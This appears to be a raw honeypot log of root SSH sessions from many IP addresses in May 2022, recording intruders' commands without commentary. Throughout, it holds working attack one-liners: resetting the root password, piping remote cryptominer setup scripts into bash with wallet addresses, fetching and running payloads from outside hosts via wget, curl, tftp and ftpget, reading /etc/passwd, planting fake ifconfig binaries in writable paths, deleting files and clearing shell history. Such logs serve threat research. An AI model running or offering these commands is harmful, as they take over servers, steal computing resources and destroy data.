Exec echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.142.180 20-May-2022 22:55:18 ssh2 root
Exec echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rg755431|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 77.28.90.54 20-May-2022 23:01:22 ssh2 root
w
ls -a
ps x
lscpu
uname -a
nproc
clear
clear
l -a
ps x
cd /home
l -a
ls -a
ps x
w
arp -a
sh
ls -a
bash
ls -a
ps x
gcc
ps x
cat /etc/paswd
cat /etc/passwd
ls -a
cd /home
ls -a
cd
ls -a
id
w
ls
sudo -i
su - root
apt-get
apt-get install screen
udo
sudo
apt-get install sudo
w
sudo -i
ls -a
sudo
sh
bash
ps x
id
w

From 77.28.90.54 20-May-2022 23:03:03 ssh2 root
Exec test -x /usr/lib/sftp-server && exec /usr/lib/sftp-server
test -x /usr/local/lib/sftp-server && exec /usr/local/lib/sftp-server
exec sftp-server
test -x /usr/lib/sftp-server
exec /usr/lib/sftp-server test -x /usr/local/lib/sftp-server
exec /usr/local/lib/sftp-server exec sftp-server

From 77.28.90.54 20-May-2022 23:03:21 ssh2 root
python
curl
apt
apt-get update
apt-get update
apt-get upgrade
sh

From 179.43.142.180 20-May-2022 23:26:31 ssh2 root
Exec echo root:dgtij26jti5u5ji6rgg755431|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rgg755431|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.142.180 21-May-2022 20:06:18 ssh2 root
Exec echo root:dgtij26jti5u5ji6rgg7554313|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rgg7554313|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.142.180 23-May-2022 04:54:55 ssh2 root
Exec echo root:dgtij26jti5u5ji6rgg73554313g3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rgg73554313g3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 31.11.112.117 23-May-2022 12:58:18 ssh2 root
w
nproc
lscpu
w
ls -a
cd /home
ls
ls -a
cat .bash_history
cd
ls
ls -a
cat .bash_history
cat .bashrc
history -c
ls
uname -a
cat /etc/issue
passwd
password
passwd
apt-get install passwd
apt-get install glibc.i686
update
apt-get install update
passwd
passwd
update
apt-get update
wget http://49.212.165.107/img/.a/a.tgz
tar -xf a.tgz
rm -rf a.tgz
perl a.pdf
rm -rf a.pdf
history -c'
curl
apt-get install curl
curl
curl - o

From 179.43.142.180 23-May-2022 13:03:04 ssh2 root
Exec echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
curl https://www.getpagespeed.com/files/centos6-eol.repo --output /etc/yum.repos.d/CentOS-Base.repo
clear
exit

From 179.43.142.180 23-May-2022 13:10:17 ssh2 root
Exec echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash; lspci | grep -i --color 'vga\|3d\|2d'; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA
echo root:dgtij26jti5u5ji6rgg73554313gg3|chpasswd|bash
lspci | grep -i --color 'vga\|3d\|2d'
curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA

From 179.43.144.210 23-May-2022 14:49:08 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://2.56.59.196/Saitama.sh; curl -O http://2.56.59.196/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 2.56.59.196 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 2.56.59.196; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://2.56.59.196/Saitama.sh
curl -O http://2.56.59.196/Saitama.sh
chmod 777 Saitama.sh
sh Saitama.sh
tftp 2.56.59.196 -c get tSaitama.sh
chmod 777 tSaitama.sh
sh tSaitama.sh
tftp -r tSaitama2.sh -g 2.56.59.196
chmod 777 tSaitama2.sh
sh tSaitama2.sh
ftpget -v -u anonymous -p anonymous -P 21 2.56.59.196 Saitama1.sh Saitama1.sh
sh Saitama1.sh
rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh
rm -rf *

From 139.59.21.115 23-May-2022 14:56:40 ssh2 root
Exec uname -a ; nproc 
uname -a
nproc

From 85.202.169.117 23-May-2022 19:26:13 ssh2 root
Exec wget 194.31.98.205/x86_64; chmod 777 x86_64; ./x86_64 wns.x86
wget 194.31.98.205/x86_64
chmod 777 x86_64
./x86_64 wns.x86

From 103.161.17.72 25-May-2022 12:30:38 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://103.161.17.72/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g 103.161.17.72 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://103.161.17.72/ISIS.sh
chmod 777 *
sh ISIS.sh
tftp -g 103.161.17.72 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 103.105.12.48 25-May-2022 22:46:22 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 103.90.177.102 25-May-2022 22:58:47 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 103.152.37.54 25-May-2022 22:59:13 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 106.126.14.181 25-May-2022 23:04:39 ssh2 root
Exec cd /tmp ; rm -rf ok.sh wget 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 156.38.209.136/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c ; wget 156.38.209.136/cnrig ; chmod 777 cnrig ; ./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B ; history -c ; cat /dev/null > ~/.bash_history && history -c && rm -rf /root/.bash_history
cd /tmp
rm -rf ok.sh wget 156.38.209.136/ok.sh
sh ok.sh
rm -rf ok.sh
curl -O 156.38.209.136/ok.sh
sh ok.sh
rm -rf ok.sh
history -c
wget 156.38.209.136/cnrig
chmod 777 cnrig
./cnrig --donate-level 1 -o pool.supportxmr.com:443 -u 42yA8XVUCAWKAztxYLTJ96e8pYfN5K3fQZBftWQkChTVaVuDkQskvxy9hZDFRacvo7KKGUkzptCsiGoXBKCAQnRWFMeWtcD -p skema2 -k --tls -B
history -c
cat /dev/null > ~/.bash_history
history -c
rm -rf /root/.bash_history

From 185.55.64.228 25-May-2022 23:16:55 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 209.216.177.158 25-May-2022 23:20:38 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 43.242.247.139 25-May-2022 23:30:14 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig

From 222.187.196.26 26-May-2022 00:11:57 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 2.197.115.147 26-May-2022 00:17:28 ssh2 root
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 90.119.54.66 26-May-2022 00:25:29 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 183.213.26.13 26-May-2022 00:29:22 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig

From 61.84.162.66 26-May-2022 00:36:09 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 223.171.91.146 26-May-2022 00:37:29 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 210.14.135.2 26-May-2022 00:39:52 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 210.14.135.2 26-May-2022 00:43:38 ssh2 root
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 124.222.13.124 26-May-2022 00:45:28 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 123.132.238.210 26-May-2022 00:54:36 ssh2 root
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 84.121.59.55 26-May-2022 00:59:32 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 150.107.95.20 26-May-2022 01:04:16 ssh2 root
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig

From 122.233.158.0 26-May-2022 01:16:59 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig

From 136.52.6.221 26-May-2022 01:28:02 ssh2 root
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig
echo > /tmp/ifconfig
chmod 777 /tmp/ifconfig
cat > /tmp/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 117.80.212.33 26-May-2022 01:30:01 ssh2 root
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 188.78.252.28 26-May-2022 01:32:10 ssh2 root
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234

From 121.200.53.148 26-May-2022 01:48:28 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig
echo > /root/ifconfig
chmod 777 /root/ifconfig
cat > /root/ifconfig

From 223.171.91.169 26-May-2022 01:49:40 ssh2 root
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig
echo > /etc/ifconfig
chmod 777 /etc/ifconfig
cat > /etc/ifconfig

From 117.54.14.169 26-May-2022 01:50:14 ssh2 root
Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig
echo > /var/tmp/ifconfig
chmod 777 /var/tmp/ifconfig
cat > /var/tmp/ifconfig
Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig
echo > ./ifconfig
chmod 777 ./ifconfig
cat > ./ifconfig
Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig
echo > /dev/shm/ifconfig
chmod 777 /dev/shm/ifconfig
cat > /dev/shm/ifconfig

From 62.171.164.101 26-May-2022 01:53:06 ssh2 root
Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234
